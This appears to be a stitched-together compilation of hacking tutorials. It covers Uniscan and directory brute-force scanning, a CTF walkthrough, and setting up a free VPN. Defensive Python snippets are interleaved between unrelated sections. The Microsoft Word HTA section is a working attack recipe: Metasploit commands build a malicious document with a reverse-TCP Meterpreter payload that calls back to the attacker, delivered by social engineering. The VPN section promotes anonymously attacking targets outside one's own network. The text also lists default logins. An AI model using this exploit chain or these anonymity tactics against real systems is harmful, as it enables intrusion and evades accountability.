
Scan Website Vulnerability using Uniscan (Beginner Guide)

This article demonstrates enumeration with the Kali Linux tool Uniscan.
Uniscan is a simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner. It also works as an enumeration tool, gathering information such as the target's open ports and protocols and checking them for known vulnerabilities.
Let’s start!!!

Open the terminal and type the following command, using the -j option for server fingerprinting.



It starts the enumeration with PING, sending ICMP packets to the targeted server to confirm it is reachable.
Next it runs TRACEROUTE to show the path a packet takes from source to destination, listing every router it passes through (or the hop at which it fails and the packet is discarded). In practice, it tells you how long each 'hop' from router to router takes.


NSLOOKUP is a program for querying Internet domain name servers (DNS). Here it is used for reverse DNS (rDNS), which resolves an IP address into a domain name.


Uniscan then runs an aggressive NMAP scan against the targeted server to identify open ports and the services behind them; the result is visible in the screenshot. It also runs NMAP NSE scripts against the target to identify vulnerabilities and details of the running services.


Now type the following command for a dynamic scan against the targeted server using the -d option.
It loads the selected plug-ins to fetch more details about the targeted server.


In the screenshot you can see the result: it found an email address and then loaded further plug-ins to scan for vulnerabilities such as SQL injection, remote or local file inclusion and XSS.


In the screenshot below you can see it tested for blind SQL injection and returned a link to the targeted web page. It tests for XSS and remote or local file inclusion in the same way.


Now type the next command, using the -q option to enable the directory test against the targeted server:
uniscan -u http://192.168.1.1107 -q
From the scan result you can read the directories it found.


Last but not least, use the -g option for web fingerprinting with the following command:
uniscan -u http://192.168.1.1107 -g
Here we have come across the available HTTP methods GET, HEAD, POST, OPTIONS and TRACE, which might help in verb tampering.
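The method list that the -g fingerprint turns up is the same thing a server owner can audit from their own side. The following Python is an added example, not part of the original post or of Uniscan: it parses the Allow header of an OPTIONS response and reports any method outside a permitted list. The response text is constructed for the example (the banner and date are placeholders), and the permitted list is an assumption for a plain read/submit application.

```python
"""Audit the Allow header of an OPTIONS response against a permitted list."""

# Constructed sample response (not captured from the post's target): a server
# that still advertises TRACE alongside the usual read/submit methods.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Tue, 10 Oct 2017 10:00:00 GMT\r\n"
    "Server: ExampleHTTPd/1.0\r\n"
    "Allow: GET,HEAD,POST,OPTIONS,TRACE\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Assumed baseline for a plain web application. Anything beyond it is a
# finding to review: TRACE enables cross-site tracing, PUT/DELETE give write
# access, and an unexpected verb is exactly what verb tampering relies on.
DEFAULT_PERMITTED = ("GET", "HEAD", "POST", "OPTIONS")


def allowed_methods(response_text):
    """Return the methods advertised in the Allow header, upper-cased, in order."""
    head, _, _ = response_text.partition("\r\n\r\n")
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "allow":
            return [m.strip().upper() for m in value.split(",") if m.strip()]
    return []


def unexpected_methods(response_text, permitted=DEFAULT_PERMITTED):
    """Methods the server allows that are not on the permitted list."""
    return sorted(set(allowed_methods(response_text)) - set(permitted))


if __name__ == "__main__":
    extra = unexpected_methods(SAMPLE_OPTIONS_RESPONSE)
    print("methods to review:", ", ".join(extra) or "none")
```

On Apache the usual fix for the TRACE finding is `TraceEnable off` in the main configuration, and a `<LimitExcept GET POST HEAD>` block can reject every other verb for a location.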


It also tries to find the web service and error information, including the type of error, as shown in the image.


Here the tool inserts a string into the HTML in order to grab the banner. We have also come across the web server's credentials: from the screenshot you can read the login msfadmin:msfadmin.

5 Ways to Directory Bruteforcing on Web Server

In this article we focus on directory brute force attacks using Kali Linux tools, trying to find hidden files and directories on a web server during a penetration test.

A path traversal attack, also known as directory traversal, aims to access files and directories stored outside the web root folder. By manipulating variables that reference files with "dot-dot-slash (../)" sequences and their variations, or by using absolute file paths, it may be possible to access arbitrary files and directories on the file system, including application source code, configuration and critical system files. For more information visit owasp.org
Let’s Start!!!

DIRB
DIRB is a Web Content Scanner. It looks for existing (and/or hidden) web objects. It works by launching a dictionary-based attack against a web server and analysing the responses. DIRB's main purpose is to help in professional web application auditing.

The tool dirb is built into Kali Linux, so open the terminal and type the following command to start the directory brute force attack.


You can read the fetched directories and files in the given screenshot.


DirBuster

DirBuster is a multi-threaded Java application designed to brute force directory and file names on web/application servers. DirBuster comes with a total of 9 different lists, which makes it extremely effective at finding hidden files and directories.

Similarly, open the terminal and type dirbuster, then enter the target URL as shown in the image below and browse to /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt as the wordlist for the brute force attack.

Select the option to start with /dvwa as the starting directory; once you have configured the tool for the attack, click Start.


This starts the brute force attack and dumps every file and directory found on the web server, as shown in the screenshot.


Wfuzz

Wfuzz is a tool designed for brute forcing web applications. It can be used to find resources that are not linked (directories, servlets, scripts, etc.), to brute force GET and POST parameters to check for different kinds of injection (SQL, XSS, LDAP, etc.), to brute force form parameters (user/password), for fuzzing, and so on.

wfuzz -c -w /usr/share/wfuzz/wordlist/dir/common.txt --hc 400,404,403 http://192.168.1.5/dvwa/FUZZ

Here the option -c colours the output; -w specifies the wordlist; --hc hides responses with the specified status codes (it also accepts line/word/character counts). Wfuzz is also built into Kali Linux.


Metasploit

HTTP Directory Scanner
This module identifies the existence of interesting directories in a given directory path.
use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set DICTIONARY /usr/share/wfuzz/wordlist/dirb/common.txt
msf auxiliary(dir_scanner) > set rhosts 192.168.1.5
msf auxiliary(dir_scanner) > set path /dvwa
msf auxiliary(dir_scanner) > exploit


Dirsearch

Dirsearch is a simple command line tool designed to brute force directories and files in websites. This tool is available on GitHub; download it from there and, after installing it on your Kali Linux, type the following to start dirsearch.

./dirsearch.py -u http://192.18.1.5/dvwa -e php -f -x 400,403,404

Here the option -e tells it to test the php extension; -x hides responses with the specified status codes.
From the screenshot you can read the PHP files found on the targeted web server.
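All five tools above leave the same trace on the server: one client requesting many different paths that do not exist, in a short time. The following Python is an added example, not part of the original post or of any of the tools: it parses Apache combined-format access log lines and flags any client that produced at least a threshold number of distinct missing paths within a sliding window. The log lines are constructed for the example (the DirBuster user agent is assumed, and the IPs are the ones used in the post), and the threshold and window are assumptions to tune for a real site.

```python
"""Flag directory brute forcing from web server access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Apache combined log format: ip ident user [ts] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one browsing user (192.168.1.9) and one scanner
# (192.168.1.5) walking a wordlist under /dvwa, as in the post's examples.
SAMPLE_LOG = """\
192.168.1.9 - - [10/Oct/2017:10:00:01 +0000] "GET /dvwa/ HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
192.168.1.5 - - [10/Oct/2017:10:00:02 +0000] "GET /dvwa/admin HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
192.168.1.5 - - [10/Oct/2017:10:00:02 +0000] "GET /dvwa/backup HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
192.168.1.5 - - [10/Oct/2017:10:00:03 +0000] "GET /dvwa/cgi-bin/ HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
192.168.1.9 - - [10/Oct/2017:10:00:03 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1289 "-" "Mozilla/5.0"
192.168.1.5 - - [10/Oct/2017:10:00:03 +0000] "GET /dvwa/config HTTP/1.1" 403 214 "-" "DirBuster-1.0-RC1"
192.168.1.5 - - [10/Oct/2017:10:00:04 +0000] "GET /dvwa/test HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
192.168.1.5 - - [10/Oct/2017:10:00:04 +0000] "GET /dvwa/old HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
192.168.1.9 - - [10/Oct/2017:10:00:05 +0000] "GET /dvwa/favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.168.1.5 - - [10/Oct/2017:10:00:05 +0000] "GET /dvwa/tmp HTTP/1.1" 404 209 "-" "DirBuster-1.0-RC1"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_bruteforce(lines, threshold=5, window_seconds=60, miss_codes=(404,)):
    """Return {ip: peak count} for clients that hit >= threshold distinct missing
    paths inside any window of window_seconds. Counting distinct paths rather
    than raw hits keeps a browser retrying one missing favicon below the bar."""
    misses = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] in miss_codes:
            misses[rec["ip"]].append((rec["ts"], rec["path"]))

    flagged = {}
    for ip, events in misses.items():
        events.sort()
        best, start = 0, 0
        for end in range(len(events)):
            # slide the window start forward until it fits within window_seconds
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            distinct = len({path for _, path in events[start:end + 1]})
            best = max(best, distinct)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, peak in find_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {peak} distinct missing paths in one window")
```

Including 403 in miss_codes catches scanners that probe protected paths too; in the sample that raises the scanner's count by one (the /dvwa/config hit) and still leaves the ordinary user unflagged.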

Exploit Remote PC using Microsoft Office Word Malicious Hta Execution

For Kali Linux users we performed this attack through Metasploit, without using any Python script to generate the .rtf file; the user only needs to update Kali Linux and load the Metasploit framework to start the attack. This is a zero-day exploit with an excellent rating against the MS Office vulnerability and can very easily be used against any targeted Windows system.

Attacker: Kali Linux
Target: MS Office

Let’s breach!!


msfconsole


This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request, and execute hta code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.

Object Linking and Embedding, based on the Component Object Model (COM), provides most of the compatibility in Office, working with default and third-party applications to provide rich document features to Office users.
use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set srvhost 192.168.1.8
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set filename sale.doc
msf exploit(office_word_hta) > set lhost 192.168.1.8
msf exploit(office_word_hta) > exploit

This module automatically generates the malicious .rtf file at /root/.msf4/local/sales.doc and also generates a link; that link must be shared with the target using social engineering.


When the user opens that link and double-clicks (an OLE event) the .hta file, the attacker receives a meterpreter session in the Metasploit framework.
meterpreter > sysinfo

Hack the Defense CTF (CTF Challenge)

Defence VM is made by the Silex Secure team. This VM is designed to honour and pay respects to the military of Nigeria and the soldiers who stood up against the terrorist attack. It is of intermediate level and is very handy for brushing up your skills as a penetration tester. You can download it from https://www.vulnhub.com/entry/defence-space-ctf-2017,179/

Are you ready for the challenge, soldier? The first step of an attack is to identify the target. To identify the target we will use the following command:


netdiscover


Now that you have identified your target (mine is 192.168.1.17) you will need to capture it and declare your victory. To capture it we need a plan to get inside the enemy's position, so let's search for all the doors, closed or not. For that, let's fire up nmap.
nmap -p- -A 192.168.1.17


Our search shows that ports 21, 80, 443 and 2225 are open, running FTP, HTTP, HTTPS and SSH respectively. As port 80 is open we can open the target IP in the browser.


But there is no hint whatsoever there. Since this is based on military themes, the hint could be camouflaged, so let's check the source code.

And yes!! We have found flag 0, although it is encoded in base64. Decoding it gives netdiscover.

As the source is unknown territory, I inspected it further and found a directory that proved to be very useful: assests/lafiya.js


Open that path in the browser and check its source. In the source you will find flag 1, which is in hex.


Converting the hex uncovers flag 2 in MD5 form.


When you convert the MD5 value back to its original, it is nmap, as shown in the image below.


The second flag was nmap, which means there is something in the nmap output that we missed. On reviewing it I remembered that the SSH service was open on port 2225, so I accessed it with the following command.
ssh 192.168.1.17 -p 2225


And there we have it: our flag 2B as an MD5 value. Let's convert it.


Our flag 2B is encrypt. That means there is something related to encryption and security. The best way to secure a website is through its security certificate, so let's check it out.


Upon examining the certificate, you will find your third flag and a hint, i.e. [39 39 30].


Firstly, decode the flag, which will be unit.


The combination of 3, 9 and 0 will be the suffix of the word unit. There are a lot of combinations for it, so let's create them with crunch:
crunch 3 3 390


We get 27 possible combinations, so make a text file for a dictionary attack and add the word 'unit' as a prefix to every combination. Now let's use dirb to find anything related to unit and these combinations.
dirb http://192.168.1.17 /root/Desktop/dict.txt
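The flag chain above is a sequence of encoding layers (base64, hex, then an MD5 that only a dictionary can reverse) followed by the crunch step that builds the unit### wordlist. The following Python is an added example that is not part of the walkthrough and uses nothing from the VM: it peels hex and base64 layers off a value until plain text or a 32-character digest remains, reverses an MD5 against a small wordlist, and generates the 27 unit candidates without crunch. The only sample value in it is the base64 of "netdiscover", constructed here because the post shows its flags only in screenshots; the wordlist is an assumption.

```python
"""Peel encoding layers off CTF flags and generate suffix candidates (added example)."""
import base64
import binascii
import hashlib
import itertools
import re
import string

HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
PRINTABLE = set(string.printable)

# Constructed sample standing in for flag 0: base64 of "netdiscover".
SAMPLE_FLAG0 = "bmV0ZGlzY292ZXI="


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def _as_text(data):
    """Return data as ASCII text if every byte is printable, else None."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def peel(value, max_layers=8):
    """Strip hex and base64 layers until plain text or an MD5-shaped digest remains.

    Returns (innermost value, names of the layers removed, outermost first).
    A layer is only accepted when decoding it yields printable ASCII, which is
    what stops the loop on a real word like "unit" that happens to look like
    base64. Exactly 32 hex characters are treated as a digest, not as a layer.
    """
    layers = []
    current = value.strip()
    for _ in range(max_layers):
        if len(current) == 32 and HEX_RE.match(current):
            break
        text, kind = None, None
        if len(current) % 2 == 0 and HEX_RE.match(current):
            text, kind = _as_text(bytes.fromhex(current)), "hex"
        if text is None and len(current) % 4 == 0 and B64_RE.match(current):
            try:
                text, kind = _as_text(base64.b64decode(current, validate=True)), "base64"
            except binascii.Error:
                text = None
        if text is None:
            break
        layers.append(kind)
        current = text
    return current, layers


def crack_md5(digest, wordlist):
    """Dictionary reversal of an MD5 digest; None if no word matches."""
    digest = digest.lower()
    for word in wordlist:
        if md5_hex(word) == digest:
            return word
    return None


def unit_candidates(alphabet="390", length=3, prefix="unit"):
    """Every fixed-length string over the alphabet with the prefix: the crunch + dict.txt step."""
    return [prefix + "".join(p) for p in itertools.product(alphabet, repeat=length)]


if __name__ == "__main__":
    print(peel(SAMPLE_FLAG0))                      # ('netdiscover', ['base64'])
    digest = md5_hex("nmap")
    print(peel(digest.encode().hex()))            # hex layer peeled, digest kept
    print(crack_md5(digest, ["ftp", "nmap", "encrypt"]))
    print(len(unit_candidates()), unit_candidates()[:3])
```

The digest rule is a heuristic: a hex layer whose decoded text is itself exactly 16 bytes long would be mistaken for an MD5, so for other challenges adjust that check or call peel on the decoded bytes yourself.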


To our joy there is a directory called unit990. Let's open it in the browser without further delay.


We do not have credentials to log in, so I checked its source code instead. In the source code you will find flag 4 in base64.


Decode the flag and you will get admin.php



Opening the previously found directory in the browser shows the same page, but its source code is different. When you check it, you will find flag 5, again in base64.


Decoding flag 5 gives SQL injection. That means the next step should be SQL injection.


This hint is just to throw us off our track. I used every SQL injection technique I could find, but it didn't help. So I used dirb on the target.

dirb http://192.168.1.17


I found a directory called assets, opened it in the browser and found the 7th flag.


Now try and decode it: widgets.

You can try to decode it further, but it's hopeless to decode it anywhere online. So I examined the dirb result more closely and found another directory called phpmyadmin


If you open this directory in the browser you will find a login page. I used one of the top 10 most commonly used username and password pairs, i.e. root and root, and got in. In the database I found a silex table. Since silex is the team's name, I guessed this was the most important table.


Upon checking it, I found admin, and in admin there was our 6th flag encoded in base64


Upon decoding, it says Nigiarforcecloud.


And voila!! All our flags are uncovered. Good work, soldiers. Solving this VM was a good exercise; I salute the fallen Nigerian soldiers, wish them peace and praise the whole army.

How to use Public IP on Kali Linux

Today through this article you will learn how an attacker can use an anonymous VPN service to obtain a public IP, which will surely expand your target list and let you attack outside your own network as well.
Let’s Start!
In your Kali Linux open the terminal and type the following commands to install PPTP support for VPN configuration.

apt-get install network-manager-pptp


apt-get install network-manager-pptp-gnome


Ipjetable.net is a website that provides a free VPN service to registered users, but the site only opens through a proxy server, so I used free-proxy.xyz to open the ipjetable.net web page.


Here you need to unlock the website so that you can use the VPN service anonymously. Click on the 'I subscribe' tab. I used Google Translate here.


It then requires registration to unlock the VPN service, so give your email address for registration. I used a temporary email address.


When you register on the website it sends a mail to your inbox containing the username and password we will use for the VPN login. In the given screenshot we have highlighted the link; copy this link.


Now paste the copied link into free-proxy.xyz, as done above, to unlock the login page for the VPN service.
Once unlocked, the web page shown below opens in the browser and asks for login credentials; enter the username and password received by mail.


Now click on 'install ipjetable', which starts the VPN service installation for your local network.


In your Kali Linux click on the power icon in the top right corner of the screen to configure the VPN, then select the wired connection.


Now click on the (+) 'plus' button to add a new network connection.


Select Point-to-Point Tunneling Protocol (PPTP).


Now add the username and password to connect to the VPN server. Then click on the Advanced tab and select the radio button 'store password only for this user'.


As shown in the screenshot, select the check boxes for PPTP authentication and encryption; once all configuration is complete, click OK. At this point we have configured the VPN service successfully in our Kali Linux.


Let's check the VPN IP we have obtained:
ifconfig
From the screenshot you can read that 192.168.0.102 is my local IP and 141.255.151.15 is our public IP; now use this IP for your attacks, even outside your own network.